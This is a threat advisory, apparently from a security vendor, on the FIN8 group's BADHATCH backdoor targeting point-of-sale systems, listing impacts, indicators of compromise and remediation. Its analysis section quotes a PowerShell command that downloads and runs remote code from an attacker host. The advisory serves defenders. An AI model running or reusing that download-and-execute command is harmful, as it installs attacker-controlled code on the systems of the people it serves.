Informative Update – Microsoft Exchange One-Click On-Premises Mitigation Tool
March 16, 2021Rewterz Threat Alert – New Mirai Variant Targeting New IoT Vulnerabilities, Network Security Devices
March 16, 2021Informative Update – Microsoft Exchange One-Click On-Premises Mitigation Tool
March 16, 2021Rewterz Threat Alert – New Mirai Variant Targeting New IoT Vulnerabilities, Network Security Devices
March 16, 2021Severity
High
Analysis Summary
Fin8 made it’s debut in 2016 and is known to take long breaks to improve their TTPs. This group is known to have used a diverse array of techniques, from spear-phishing to zero-day exploits in Windows, to infect retail, hospitality and entertainment companies and steal payment card data from POS systems. The BADHATCH malware is a mature, highly advanced backdoor that uses several evasion and defense techniques. The new backdoor also attempts to evade security monitoring by using TLS encryption to conceal Powershell commands.
ATTACK ANALYSIS
Command line “powershell.exe -nop $pa=’sys’;iex (New-Object System.Net.WebClient). DownloadString(‘https://192-129-189-73[.]sslip[.]io/ yo’)”. It abuses sslip.io – a service that provides free IP to domain mapping to make SSL certificate generation easier (for traffic encryption). While the service is legitimate and widely used, the malware abuses it in an attempt at evading detection.
Impact
- Financial loss
- Steal credit card information
- Exposure of sensitive data
Indicators of Compromise
IP
- 198[.]46[.]140[.]52
- 192[.]129[.]189[.]73
MD5
- f12f70c4756826105d693af27bb10627
- e73c4185f9712671c683f28fbddd1cca
- bf7fcef0f51a7fe6d00752b8cdf25762
- 5b638fde02fb7bf18ff68e9d99bd8de0
- 39145f3e1ac2d74d19cb4137ee3db000
SHA-256
- dbb3a665f9460343eb7625f8625815179e63aaa83f91b9283a296142ec4b2bbb
- c328b3714df8400f4d4c071edb1f6d3b82d42488ebf8d9437c300bec9108755b
- 981ecfc67d7192f0e82f3f8042d7c26c78396a3a62e5e34c717db31aee566eca
- 428cf5d05d9c3d4f7601ff785a175c1d86a90fe060a1f33976b363e8f9530a88
- 355d200eebf9d9102d5f2ba0c8a576948aef43640ae8f0eedf101e0e881be0b0
SHA1
- 79e5ac6f2a517ab7fa0e2bd0103ea0c14958e8e9
- 75fc0ce25767c0366b9c330de99f077620bb7c37
- 5d97e581853be9a8ca94a3b09d9f75f4ce99ef56
- 6c21e2aef9f3441786920acc6aa7bfddb240b2a6
- f229183304a5a1308b844a06b2b618cdd5518111
URL
- https[:]//192-129-189-73[.]sslip[.]io/yo
- https[:]//192-129-189-73[.]sslip[.]io/80
- https[:]//198-46-140-52[.]sslip[.]io/xxx
Remediation
- Separate the POS network from the ones used by employees or guests.
- Block all threat indicators at your respective controls.
- Search for IOCs in your environment.